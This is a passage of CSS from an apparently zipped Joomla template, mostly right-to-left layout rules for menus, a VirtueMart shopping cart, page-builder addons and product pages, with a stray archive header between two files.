format("woff"),url(../fonts/fa-regular-400.ttf) format("truetype")}.far{font-weight:400}@font-face{font-family:"Font Awesome 5 Free";font-style:normal;font-weight:900;font-display:auto;src:url(../fonts/fa-solid-900.woff) format("woff"),url(../fonts/fa-solid-900.ttf) format("truetype")}.fa,.far,.fas{font-family:"Font Awesome 5 Free"}.fa,.fas{font-weight:900}PK!�+Ͽflex/css/rtl.cssnu&1i�.form-control {
  display: block;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.428571429;
  color: #555555;
  background-color: #fff;
  background-image: none;
  border: 1px solid #ccc;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -moz-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
}
.form-control::-moz-placeholder {
  color: #999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999;
}
.form-control::-webkit-input-placeholder {
  color: #999;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  cursor: not-allowed;
  background-color: #eeeeee;
  opacity: 1;
}
textarea.form-control {
  height: auto;
}
.offcanvas .off-canvas-menu-wrap {
  left: 0;
  right: auto;
  -webkit-transform: translateX(320px);
  transform: translateX(320px);
}
.offcanvas .off-canvas-menu-wrap:after {
  left: 0;
  right: auto;
}
body.rtl .sppb-shape-container svg {
  width: 100% !important;
  height: auto;
}
body.rtl #sp-top-bar .sp-module {
  margin: 0 20px 0 0;
}
body.rtl .sp-contact-info {
  float: left;
}
body.rtl .sp-module-content .mod-languages .dropdown-toggle {
  padding: 3px 14px 3px 10px;
}
body.rtl .sp-module-content .mod-languages .dropdown-toggle img {
  padding: 2px 0 0 7px;
  float: right;
}
body.rtl .sp-module-content .mod-languages .dropdown-toggle >i {
  padding: 0 4px 0 0;
}
body.rtl .sp-module-content .mod-languages .dropdown-menu li a img {
  float: right;
  padding: 0 0 0 8px;
}
body.rtl .sp-module-content .mod-languages ul.lang-inline li {
  margin: 0 0 0 5px;
}
body.rtl .sp-module-content .mod-languages ul.lang-inline li:last-child {
  margin-left: 0;
}
body.rtl .sp-module-content .mod-languages ul.lang-block.vertical li {
  text-align: right;
}
body.rtl .sp-module-content .mod-languages ul.lang-block.vertical li a {
  float: right;
  display: block;
}
body.rtl .sp-module-content .mod-languages ul.lang-block.vertical li a img {
  float: right;
  direction: rtl;
  text-align: right;
  padding: 4px 0 0 8px;
}
body.rtl .sp-module-content .mod-languages ul.lang-block.vertical li a span {
  float: right;
}
body.rtl .sp-module-content .mod-languages ul.lang-block.vertical li.lang-active a i {
  padding: 0 6px 0 0;
}
body.rtl .sp-module-content ul.VMmenu > li .vmmenu-toggler {
  display: inline-block;
  position: absolute;
  top: 0;
  left: 0;
  right: auto;
  padding-left: 10px;
  padding-right: 0;
}
body.rtl .sp-module-content ul.VMmenu > li .vmmenu-toggler .open-icon:before {
  right: auto;
  left: 10px;
}
body.rtl .top-search-input-wrap .top-search-wrap {
  left: -10px;
  right: auto;
  float: right;
}
body.rtl .body-innerwrapper:after {
  left: 0;
}
body.rtl #offcanvas-toggler {
  float: left;
}
body.rtl #offcanvas-toggler >i {
  padding: 0 10px 0 0;
}
body.rtl .offcanvas-menu {
  left: 0;
  right: auto;
  -webkit-transform: translateX(-320px);
  transform: translateX(-320px);
}
body.rtl .close-offcanvas {
  left: 15px;
  right: auto;
}
body.rtl .offcanvas-menu {
  top: 0;
  left: 0;
  right: auto;
  -webkit-transform: translateX(-320px);
  transform: translateX(-320px);
}
body.rtl .offcanvas-menu .offcanvas-inner .sp-module ul > li a >img,
body.rtl .offcanvas-menu .offcanvas-inner .sp-module ul > li .nav-header >img,
body.rtl .offcanvas-menu .offcanvas-inner .sp-module ul > li .separator >img {
  margin: -4px 0 0 7px;
}
body.rtl .offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li .offcanvas-menu-toggler {
  left: 0;
  right: auto;
  padding: 11px 25px 11px 20px;
}
body.rtl .offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li .accordion-menu-toggler {
  left: 0;
  right: auto;
}
body.rtl .offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li .accordion-menu-toggler .open-icon:before {
  left: 0;
  right: auto;
  width: 44px;
}
body.rtl.offcanvas .offcanvas-menu {
  -webkit-transform: translateX(0);
  transform: translateX(0);
}
body.rtl .readmore {
  margin: 0 0 0 20px;
  float: right;
}
body.rtl .helix-social-share .helix-social-share-blog {
  float: right;
}
body.rtl .tags {
  float: right;
  margin: 7px 0 0 20px;
}
body.rtl .tags >span >i {
  margin: 0 3px 0 5px;
}
body.rtl .latest-articles a {
  float: right;
}
body.rtl .latest-articles a .article-list-img {
  float: right;
  margin: 0 0 0 15px;
}
body.rtl .latest-articles a .date {
  float: right;
  margin: 0 0 0 15px;
}
body.rtl #cart-menu,
body.rtl .cd-cart {
  float: left;
  left: 0;
}
body.rtl #cart-menu >i,
body.rtl .cd-cart >i {
  font-size: 36px;
}
body.rtl #cart-menu .total_products,
body.rtl .cd-cart .total_products {
  top: 23px;
  left: 0 !important;
  right: auto;
  float: left;
}
body.rtl #cart-menu {
  position: relative;
  float: left;
  left: 0 !important;
  right: auto;
  -webkit-transform: translateX(0);
  -moz-transform: translateX(0);
  -ms-transform: translateX(0);
  -o-transform: translateX(0);
  transform: translateX(0);
}
body.rtl #cart-menu.shopping-menu-is-open {
  left: 0;
  float: left;
}
body.rtl #cart-menu.shopping-menu-is-open #cd-menu-trigger,
body.rtl #cart-menu.shopping-menu-is-open .cd-cart {
  left: 0;
  float: left;
}
body.rtl #cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
body.rtl #cart-menu.shopping-menu-is-open .cd-cart >i {
  right: auto;
  float: left !important;
  left: 0 !important;
  padding-right: 0;
}
body.rtl #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open,
body.rtl #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open {
  float: left;
}
body.rtl #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open >i,
body.rtl #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open >i {
  float: left;
  position: relative;
}
body.rtl #cd-lateral-nav {
  right: auto;
  left: 0;
  -webkit-transform: translateX(-260px);
  -moz-transform: translateX(-260px);
  -ms-transform: translateX(-260px);
  -o-transform: translateX(-260px);
  transform: translateX(-260px);
}
body.rtl #cd-lateral-nav .cart-image {
  float: right !important;
}
body.rtl #cd-lateral-nav .cart-item {
  padding-right: 10px;
  padding-left: 0;
}
body.rtl #cd-lateral-nav .show_cart a >i {
  margin-left: 10px;
  margin-right: -5px;
}
body.rtl #cd-lateral-nav.shopping-menu-is-open {
  -webkit-transform: translateX(0);
  -moz-transform: translateX(0);
  -ms-transform: translateX(0);
  -o-transform: translateX(0);
  transform: translateX(0);
}
body.rtl #cart-menu.shopping-menu-is-open {
  position: fixed;
  -webkit-transform: translateX(260px);
  -moz-transform: translateX(260px);
  -ms-transform: translateX(260px);
  -o-transform: translateX(260px);
  transform: translateX(260px);
}
body.rtl #cart-menu.shopping-menu-is-open #cart-menu,
body.rtl #cart-menu.shopping-menu-is-open .cd-cart {
  left: 0;
  right: auto;
}
body.rtl #cart-menu.shopping-menu-is-open #cart-menu >i,
body.rtl #cart-menu.shopping-menu-is-open .cd-cart >i {
  left: -3px;
  right: auto;
}
body.rtl #cart-menu.shopping-menu-is-open #cart-menu .total_products,
body.rtl #cart-menu.shopping-menu-is-open .cd-cart .total_products {
  right: auto;
  left: 0;
  margin-left: -18px;
  position: relative !important;
}
body.rtl #cd-menu-trigger {
  right: auto;
  left: 0;
}
body.rtl #cd-menu-trigger .cd-menu-icon {
  display: inline-block;
  position: absolute;
  right: 50%;
  top: 50%;
  bottom: auto;
  left: auto;
}
body.rtl .vm-fieldset-customer-note textarea {
  width: 100%;
  margin-bottom: 10px;
}
body.rtl form.vm-form-login {
  display: table;
  width: 100%;
}
body.rtl form.vm-form-login .forgot {
  display: block;
}
body.rtl form.vm-form-login .forgot .floatleft {
  float: right;
  margin: 5px 0;
}
body.rtl form.vm-form-login .forgot .floatleft#com-form-login-remember label {
  padding-right: 10px;
}
body.rtl form.vm-form-login .forgot .floatleft#com-form-login-remember input.inputbox {
  margin: 0;
}
body.rtl form.vm-form-login .forgot .floatleft#com-form-login-remember input.default {
  display: inline-block;
  text-align: center;
  padding-left: 22px;
  min-width: 120px;
  padding-right: 22px;
}
body.rtl .billto-shipto a.details {
  float: right;
  margin: 7px auto;
  border: 0;
  border-radius: 4px;
}
body.rtl .billto-shipto .output-shipto input {
  margin-left: 0;
  margin-right: 10px;
}
body.rtl .billto-shipto .output-shipto .controls label {
  padding-left: 0;
  padding-right: 20px;
}
body.rtl .billto-shipto .output-shipto .controls input {
  margin-left: 0;
  margin-right: -20px;
}
body.rtl input.quantity-input {
  border-radius: 0 4px 4px 0 !important;
}
body.rtl .vm2-remove_from_cart {
  height: 16px;
  border-radius: 4px 0 0 4px !important;
}
body.rtl .vm2-remove_from_cart i {
  line-height: 16px !important;
}
body.rtl .vm-fieldset-tos .cart.tos {
  margin-left: 4px;
  margin-right: 0;
  float: right;
}
body.rtl .vm-fieldset-tos .cart.tos input.check {
  float: right;
  margin: 7px 3px 0 10px;
}
body.rtl .vm-fieldset-tos div.terms-of-service {
  float: right;
}
body.rtl .vm-fieldset-tos div.terms-of-service label {
  margin-left: 0;
  margin-right: 15px;
}
body.rtl .vm-fieldset-tos div.terms-of-service label a#terms-of-service i {
  margin: 0 3px;
}
body.rtl .checkout-button-top {
  float: right;
}
body.rtl table.user-details {
  width: 100%;
}
body.rtl table.user-details tr td label {
  text-align: left;
  padding-left: 15px;
  padding-right: 0;
  width: 100%;
}
body.rtl table.user-details tr td input {
  text-align: right;
}
body.rtl .total_products {
  position: absolute;
  top: 23px;
  left: 312px;
  right: auto;
}
body.rtl .sp-megamenu-parent {
  float: left;
}
body.rtl .sp-megamenu-parent >li >a >i {
  display: inline-block;
  line-height: inherit;
  padding-right: 0;
  padding-top: 2px;
  padding-left: 9px;
  float: right;
}
body.rtl .sp-megamenu-parent >li.sp-has-child>a:after {
  display: none;
}
body.rtl .sp-megamenu-parent >li.sp-has-child>a:before {
  font-family: "peIcon7";
  font-size: 15px;
  content: "\e688";
  margin-right: 5px;
  float: left;
  margin-top: 2px;
}
body.rtl .sp-megamenu-parent >li.sp-has-child>a:hover:before {
  font-family: "peIcon7";
  content: "\e680";
  opacity: .7;
}
body.rtl li.sp-menu-item {
  text-align: right;
}
body.rtl li.sp-menu-item >a.sp-group-title {
  margin-right: 0;
}
body.rtl li.sp-menu-item >a >i {
  padding-right: 0px;
  padding-left: 5px;
}
body.rtl li.sp-menu-item >a > img {
  margin-left: 7px !important;
  margin-right: 0 !important;
}
body.rtl .sp-dropdown.sp-menu-center {
  margin-left: 0;
  margin-right: 45px;
}
body.rtl .sp-dropdown.sp-dropdown-main.sp-menu-right,
body.rtl .sp-dropdown.sp-dropdown-main.sp-menu-full {
  left: auto;
  right: 0;
}
body.rtl .sp-dropdown.sp-dropdown-main.sp-menu-left {
  right: auto;
  left: 0;
}
body.rtl .sp-dropdown-items .sp-has-child >a:before {
  font-family: "peIcon7";
  content: "\e686";
  float: left;
}
body.rtl .sp-dropdown-items .sp-has-child >a:hover:before {
  font-family: "peIcon7";
  content: "\e688";
}
body.rtl .sp-dropdown-items .sp-has-child >a:after {
  display: none;
}
body.rtl .sppb-addon-timeline .sppb-addon-timeline-wrapper .odd .timeline-badge:after {
  left: auto;
  right: 0;
  float: left;
}
body.rtl .sppb-addon-timeline .sppb-addon-timeline-wrapper .odd .timeline-item .timeline-panel {
  margin-left: 0;
  margin-left: 15px;
  left: 0;
  right: auto;
  float: left;
  text-align: left;
}
body.rtl .sppb-addon-timeline .sppb-addon-timeline-wrapper .odd .timeline-item .timeline-panel:before {
  top: 30px;
}
body.rtl .sppb-addon-timeline .sppb-addon-timeline-wrapper .even .timeline-item .timeline-panel {
  margin-right: 15px;
  margin-left: 0;
}
body.rtl .btn,
body.rtl .sppb-btn {
  margin-left: 3px;
  margin-right: 0;
}
body.rtl .btn.sppb-selector i.fa,
body.rtl .btn.sppb-modal-selector i.fa,
body.rtl .sppb-btn.sppb-selector i.fa,
body.rtl .sppb-btn.sppb-modal-selector i.fa {
  margin: 0 0 0 4px;
}
body.rtl .btn.sppb-selector i.pe,
body.rtl .btn.sppb-modal-selector i.pe,
body.rtl .sppb-btn.sppb-selector i.pe,
body.rtl .sppb-btn.sppb-modal-selector i.pe {
  margin: -2px -2px 0 5px;
}
body.rtl .btn.btn-light i,
body.rtl .sppb-btn.btn-light i {
  margin-left: 6px;
  margin-right: 0;
}
body.rtl .btn.btn-light i.pe,
body.rtl .sppb-btn.btn-light i.pe {
  margin-left: 7px;
  margin-right: 0;
}
body.rtl .btn.responsive,
body.rtl .sppb-btn.responsive {
  white-space: normal;
  text-align: center;
  display: table;
}
body.rtl .flex-text-wrapper {
  margin: 15px 0 3px;
}
body.rtl .flex-text-wrapper .flex-text {
  margin: 20px 0 0;
  display: table-cell;
  width: 1%;
}
body.rtl .flex-text-wrapper .flex-progress-text {
  margin: 20px 0 0;
  width: 1%;
  display: table-cell;
  text-align: left;
}
body.rtl .sppb-media-body >i.fa.fa-quote-left {
  margin-left: 10px;
  margin-right: 0;
}
body.rtl .sppb-media-body >i.fa.fa-quote-right {
  margin-left: 0;
  margin-right: 10px;
}
body.rtl .sppb-nav-pills >li >a i,
body.rtl .sppb-nav-tabs >li >a i {
  margin-left: 5px;
  margin-right: 0;
}
body.rtl .sppb-tab .sppb-tab-content {
  text-align: right;
}
body.rtl .latest-post .latest-post-inner .category .posted-in {
  float: right;
  margin: 1px 0 0 5px;
  text-align: right;
}
body.rtl .sppb-addon-button-group .sppb-btn >i.fa {
  margin-left: 4px;
  margin-right: -2px;
}
body.rtl .sppb-addon-button-group .sppb-btn >i.pe {
  margin: -2px -3px 0 4px;
}
body.rtl .sppb-modal-content .sppb-close {
  left: 12px;
  padding-right: 12px;
  text-align: left;
  right: auto;
}
body.rtl .sppb-btn.sppb-btn-lg.sppb-selector >i.fa {
  margin-left: 5px;
  margin-right: 0;
}
body.rtl .sppb-btn.sppb-btn-lg.sppb-selector >i.pe {
  margin-left: 5px;
  margin-right: 0;
  margin-top: -3px;
}
body.rtl .flex.flip-container .flipper .back {
  text-align: right;
}
body.rtl .flex.flip-container .flipper .back .sppb-person-block >.thumb {
  float: right;
}
body.rtl .flex.flip-container .flipper .back .sppb-person-block >.thumb >img {
  margin: 0;
}
body.rtl .flex.flip-container .flipper .back .sppb-person-block .sppb-person-information {
  text-align: right;
  padding-right: 10px;
}
body.rtl .flex.flip-container .flipper .back .sppb-person-introtext {
  text-align: right;
}
body.rtl .sppb-pricing-box .sppb-pricing-footer >a.sppb-btn >i {
  margin-left: 5px;
  margin-right: 0;
}
body.rtl .sppb-pricing-box .sppb-pricing-footer >a.sppb-btn >i.pe {
  margin: -3px 0 0 5px;
}
body.rtl .sppb-addon-image-content.aligment-left .sppb-content-holder .sppb-btn >i.left {
  margin-right: -2px;
  margin-left: 8px;
}
body.rtl .sppb-addon-image-content.aligment-right .sppb-content-holder .sppb-btn >i.right {
  margin-left: 8px;
  margin-right: -2px;
}
body.rtl .sppb-panel-flex >.sppb-panel-heading:before,
body.rtl .sppb-panel-flex >.sppb-panel-heading.active:before,
body.rtl .sppb-panel-default >.sppb-panel-heading:before,
body.rtl .sppb-panel-default >.sppb-panel-heading.active:before,
body.rtl .sppb-panel-primary >.sppb-panel-heading:before,
body.rtl .sppb-panel-primary >.sppb-panel-heading.active:before {
  float: left;
}
body.rtl .sppb-panel-flex >.sppb-panel-heading:after,
body.rtl .sppb-panel-flex >.sppb-panel-heading.active:after,
body.rtl .sppb-panel-default >.sppb-panel-heading:after,
body.rtl .sppb-panel-default >.sppb-panel-heading.active:after,
body.rtl .sppb-panel-primary >.sppb-panel-heading:after,
body.rtl .sppb-panel-primary >.sppb-panel-heading.active:after {
  float: left;
}
body.rtl .sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i.fa,
body.rtl .sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i.fa,
body.rtl .sppb-panel-default >.sppb-panel-heading .sppb-panel-title >i.fa,
body.rtl .sppb-panel-default >.sppb-panel-heading.active .sppb-panel-title >i.fa,
body.rtl .sppb-panel-primary >.sppb-panel-heading .sppb-panel-title >i.fa,
body.rtl .sppb-panel-primary >.sppb-panel-heading.active .sppb-panel-title >i.fa {
  margin-left: 10px;
  margin-right: 0;
}
body.rtl .sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i.pe,
body.rtl .sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i.pe,
body.rtl .sppb-panel-default >.sppb-panel-heading .sppb-panel-title >i.pe,
body.rtl .sppb-panel-default >.sppb-panel-heading.active .sppb-panel-title >i.pe,
body.rtl .sppb-panel-primary >.sppb-panel-heading .sppb-panel-title >i.pe,
body.rtl .sppb-panel-primary >.sppb-panel-heading.active .sppb-panel-title >i.pe {
  margin-left: 7px;
  float: right;
  margin-right: 0;
}
body.rtl .cd-headline .before-text {
  margin-left: .1em;
  margin-right: 0;
}
body.rtl .cd-headline .after-text {
  margin-left: 0;
  margin-right: .1em;
}
body.rtl .cd-headline .cd-words-wrapper b {
  left: auto;
  right: 0;
}
body.rtl .cd-headline .cd-words-wrapper b:before {
  padding: 0 0.15em 0 0;
}
body.rtl .cd-headline .cd-words-wrapper b:after {
  padding: 0 0 0 0.15em;
}
body.rtl .cd-headline.type .after-text {
  margin-left: 0;
  margin-right: .15em;
}
body.rtl .cd-headline.type .cd-words-wrapper {
  margin-left: .1em;
  margin-right: .1em;
  padding: 0;
}
body.rtl .cd-headline.type .cd-words-wrapper i {
  text-indent: 4px;
}
body.rtl .cd-headline.type .cd-words-wrapper::after {
  left: 0;
  right: auto;
  width: 2px;
  border: 0;
  border-left: 2px solid #f14833;
}
body.rtl .cd-headline.loading-bar .cd-words-wrapper::after {
  left: auto;
  right: 0.02em;
}
body.rtl .cd-headline.loading-bar b {
  -webkit-transform: translate(115%,0);
  -moz-transform: translate(115%,0);
  -ms-transform: translate(115%,0);
  -o-transform: translate(115%,0);
  transform: translate(115%,0);
}
body.rtl .cd-headline.loading-bar b.is-visible {
  -webkit-transform: translate(0,0);
  -moz-transform: translate(0,0);
  -ms-transform: translate(0,0);
  -o-transform: translate(0,0);
  transform: translate(0,0);
}
body.rtl .cd-headline.clip .cd-words-wrapper::after {
  left: 0;
  right: auto;
}
body.rtl .cd-headline.clip b {
  padding: 0 0 0 3px;
}
body.rtl .sp-module,
body.rtl .sppb-addon-module {
  margin-top: 50px;
}
body.rtl .sp-module:first-child,
body.rtl .sppb-addon-module:first-child {
  margin-top: 0;
}
body.rtl .sp-module .sppb-addon-title,
body.rtl .sp-module .sp-module-title,
body.rtl .sppb-addon-module .sppb-addon-title,
body.rtl .sppb-addon-module .sp-module-title {
  padding-left: 30px;
  padding-right: 0;
  text-align: right;
}
body.rtl .sp-module .sppb-addon-title:after,
body.rtl .sp-module .sp-module-title:after,
body.rtl .sppb-addon-module .sppb-addon-title:after,
body.rtl .sppb-addon-module .sp-module-title:after {
  float: right;
  margin: 10px 0 0 30%;
}
body.rtl .sppb-addon >h3.sppb-addon-title {
  text-align: right;
  display: inline-block;
  padding-left: 3%;
  padding-right: 0;
}
body.rtl .sppb-addon >h3.sppb-addon-title:after {
  float: right;
  margin: 10px 0 0 30%;
}
body.rtl .sp-module ul >li >a:before {
  margin-right: 0;
  margin-left: 8px;
  float: right;
}
body.rtl .entry-header.has-post-format {
  margin-right: 62px;
  margin-left: 0;
}
body.rtl .entry-header.has-post-format h2 {
  margin: 0;
  line-height: 1.2;
  width: auto;
  padding-left: 30px;
  padding-right: 0;
}
body.rtl .entry-header.has-post-format h2:after {
  float: right;
  margin: 10px 0 0 30%;
}
body.rtl .sppb-progress-bar {
  float: right;
  text-align: right;
}
body.rtl .sppb-addon-countdown div {
  float: right;
}
body.rtl .entry-header.has-post-format {
  margin-left: 0;
  margin-right: 68px;
}
body.rtl .post-format {
  left: auto;
  right: -68px;
}
body.rtl .article-info >dt >i,
body.rtl .article-info >dd >i {
  margin-right: 0;
  margin-left: 3px;
}
body.rtl .entry-link:before {
  top: auto;
  left: auto;
  right: -60px;
  transform: rotate(-90deg);
}
body.rtl .entry-quote:before {
  left: auto;
  transform: rotate(-15deg);
  top: auto;
  right: -40px;
}
body.rtl .categories-list .page-header a.pull-right {
  float: left !important;
}
body.rtl .newsfeed-category .category li .pull-left {
  float: right !important;
}
body.rtl .voting-symbol {
  direction: ltr;
}
body.rtl .voting-symbol span.star:before {
  padding-left: 5px;
  padding-right: 0;
}
body.rtl .search button[name="Search"] {
  position: absolute;
  left: -19px;
  right: auto;
  float: left;
  border-radius: 4px 0 0 4px;
  -webkit-transition: color 300ms;
  -moz-transition: color 300ms;
  -o-transition: color 300ms;
  transition: color 300ms;
}
body.rtl .search.flex-search:before {
  position: absolute;
  margin-left: 25px;
  float: none;
  left: 0;
  right: auto;
  padding-left: 5px;
  -webkit-transition: color 300ms !important;
  -moz-transition: color 300ms !important;
  -o-transition: color 300ms !important;
  transition: color 300ms !important;
}
body.rtl .search.flex-search:hover:before,
body.rtl .search.flex-search:focus:before,
body.rtl .search.flex-search:active:before {
  margin-left: 25px !important;
}
body.rtl .search.flex-search:hover:before {
  margin-right: 0;
  float: left;
  right: auto;
  margin-left: 0px;
  left: 0;
}
body.rtl .search .btn-toolbar .pull-left {
  float: right !important;
}
body.rtl .acymailing_form .acysubbuttons {
  top: -20px;
  right: auto;
  left: -3px;
  float: left;
}
body.rtl .acymailing_form .acysubbuttons input {
  border-radius: 4px 0 0 4px;
  border: none;
}
body.rtl .vm-product-details-inner .vm-product-title .pull-left {
  width: 100%;
  display: block;
  clear: both;
}
body.rtl .vm-product-details-inner .vm-product-title h2 {
  width: 100%;
  margin: 0;
}
body.rtl .vm-product-details-inner .vm-product-shipments,
body.rtl .vm-product-details-inner .vm-nodisplay {
  display: none;
}
body.rtl .vm-product-details-inner .product-price {
  text-align: right;
}
body.rtl .vm-product-details-inner .product-short-description {
  clear: both;
  margin-bottom: 30px;
  overflow: hidden;
}
body.rtl .vm-product-details-inner .product-short-description h4 >i {
  font-size: 90%;
  margin: 5px 0 0 5px;
}
body.rtl .vm-product-details-inner .spacer-buy-area {
  padding: 0;
  display: block;
  width: 100%;
  clear: both;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar {
  padding: 0;
  margin: 0;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .cd-customization .add-to-cart {
  display: block;
  float: right;
  right: 0;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate {
  float: right;
  margin: 4px 0 0 0;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-box {
  float: none;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-box input {
  width: 32px;
  height: 32px;
  display: inline;
  text-align: center;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls {
  top: 16px;
  right: -18px;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-plus,
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  display: block;
  position: relative;
  float: left;
  z-index: 2;
  background-image: none;
  background: transparent;
  box-shadow: none;
  border: none;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-plus {
  width: 22px;
  height: 16px;
  margin: -16px 0 0 0;
  background-image: none;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  width: 20px;
  height: 16px;
  margin: 0 0 0 0;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .fa {
  position: absolute;
  z-index: 1;
  float: left;
  font-size: 9px;
  line-height: 12px;
  color: #bbb;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up {
  margin: 1px 10px 0 0;
}
body.rtl .vm-product-details-inner .spacer-buy-area .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down {
  margin: 18px 10px 0 0;
}
body.rtl .empty_cart i span.fa-ban {
  margin-right: 20px;
}
body.rtl #fancybox-content .continue_link {
  margin: 0 2.5% 0 0 !important;
  width: 45% !important;
  float: right !important;
  left: auto;
  right: 0;
}
body.rtl #fancybox-content .showcart {
  margin: 0 0 0 2.5% !important;
  width: 45% !important;
  float: left !important;
  left: 0;
}
body.rtl #fancybox-content .showcart:before {
  margin: 0 0 0 10px !important;
}
body.rtl .icons {
  float: left;
  right: auto;
  left: 1%;
  margin: 15px 0 0 15px;
}
body.rtl .icons a {
  float: right;
  display: inline-table;
}
body.rtl .vm-rating {
  width: 100%;
  display: block;
  clear: both;
  margin-bottom: 25px;
}
body.rtl .vm-rating .product-in-stock {
  float: right;
  text-align: right;
  margin-left: 5px;
  margin-right: 0;
  color: #777;
  font-size: 95%;
}
body.rtl .vm-rating .product-in-stock >i {
  margin-left: 5px;
  margin-right: 0;
}
body.rtl .vm-rating .product-in-stock >i.pe-7s-less {
  color: red;
}
body.rtl .addtocart-bar {
  width: 100%;
  height: 44px;
  display: block;
  clear: both;
}
body.rtl div.ask-a-question {
  float: right;
}
body.rtl div.ask-a-question a.ask-a-question i {
  margin-left: 7px;
  margin-right: 0;
}
body.rtl .back-to-category {
  float: right;
}
body.rtl .back-to-category a i {
  margin-left: 7px;
  margin-right: 0;
}
body.rtl .products-desc-tab .nav-tabs >li {
  float: right;
}
body.rtl .products-desc-tab .nav-tabs >li >a {
  margin: 0 0 0 7px;
}
body.rtl .products-desc-tab .nav-tabs >li >a >i {
  margin: -1px 0 0 10px;
}
body.rtl .products-desc-tab .tab-content .tab-pane .rating_wrap {
  margin: 20px auto;
  padding: 12px 10px 8px;
}
body.rtl .products-desc-tab .tab-content .tab-pane .rating .ratingbox {
  display: block;
}
body.rtl .products-desc-tab .tab-content .tab-pane .rating .ratingbox span {
  float: left;
}
body.rtl .products-desc-tab .tab-content .product-description ul {
  padding: 0;
}
body.rtl .products-desc-tab .tab-content .product-description ul >li {
  list-style: none;
}
body.rtl .products-desc-tab .tab-content .customer-reviews h4 {
  padding: 0 0 15px 5%;
  margin: 0;
}
body.rtl .products-desc-tab .tab-content .customer-reviews .list-reviews {
  margin: 20px auto;
}
body.rtl .products-desc-tab .tab-content .customer-reviews .list-reviews span.date {
  margin: 6px 0 0 5px;
}
body.rtl .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  margin-left: 8px;
}
body.rtl .products-desc-tab .tab-content .customer-reviews .list-reviews blockquote {
  margin-left: 110px;
}
body.rtl .products-desc-tab .tab-content .customer-reviews .list-reviews blockquote:before {
  padding-left: 6px;
  padding-right: 0;
}
body.rtl .products-desc-tab .tab-content .customer-reviews .list-reviews blockquote:after {
  padding-left: 6px;
  padding-right: 0;
}
body.rtl .products-desc-tab .tab-content .customer-reviews .list-reviews .bold {
  padding-left: 6px;
  padding-right: 0;
}
body.rtl .products-desc-tab .tab-content .customer-reviews .write-reviews {
  text-align: right;
  margin: 20px 0;
}
body.rtl .currency-selector-module select {
  max-width: 71%;
  float: right;
  margin-left: 5px;
}
body.rtl .currency-selector-module button.btn,
body.rtl .currency-selector-module input.btn {
  width: 22%;
}
body.rtl .cart-view .jumbotron .btn i {
  margin: 0 -5px 0 10px;
  float: right;
}
body.rtl .orderby-displaynumber {
  margin: 0 auto 20px;
  display: block;
  clear: both;
  width: 100%;
}
body.rtl .orderby-displaynumber .vm-order-list {
  float: right;
  right: 0;
  left: auto;
}
body.rtl .orderby-displaynumber .vm-order-list .orderlistcontainer {
  float: right;
  margin: 0 0 0 8px;
}
body.rtl .orderby-displaynumber .vm-order-list .orderlistcontainer .title {
  display: inline-block;
  padding: 5px 15px 5px 8px;
  font-size: 14px;
  -webkit-transition: all .5s ease-in-out;
  transition: all .5s ease-in-out;
}
body.rtl .orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  padding: 0 8px 0 0;
}
body.rtl .orderby-displaynumber .vm-order-list .orderlistcontainer .activeOrder {
  background-image: none;
  display: inline-block;
  border: none;
  padding: 0 0 0 15px;
  font-size: 14px;
}
body.rtl .orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  -webkit-transition: all .25s ease-in-out;
  transition: all .25s ease-in-out;
  border: 0;
  border-radius: 0 0 4px 4px;
  box-shadow: 0 0 0 1px #ddd;
  cursor: pointer;
  visibility: hidden;
  opacity: 0;
  display: block;
  position: absolute;
  z-index: 2;
  margin-top: -10px;
}
body.rtl .orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div {
  padding: 0;
  margin: 0;
  width: 170px;
  -webkit-transition: all .25s ease-in-out;
  transition: all .25s ease-in-out;
}
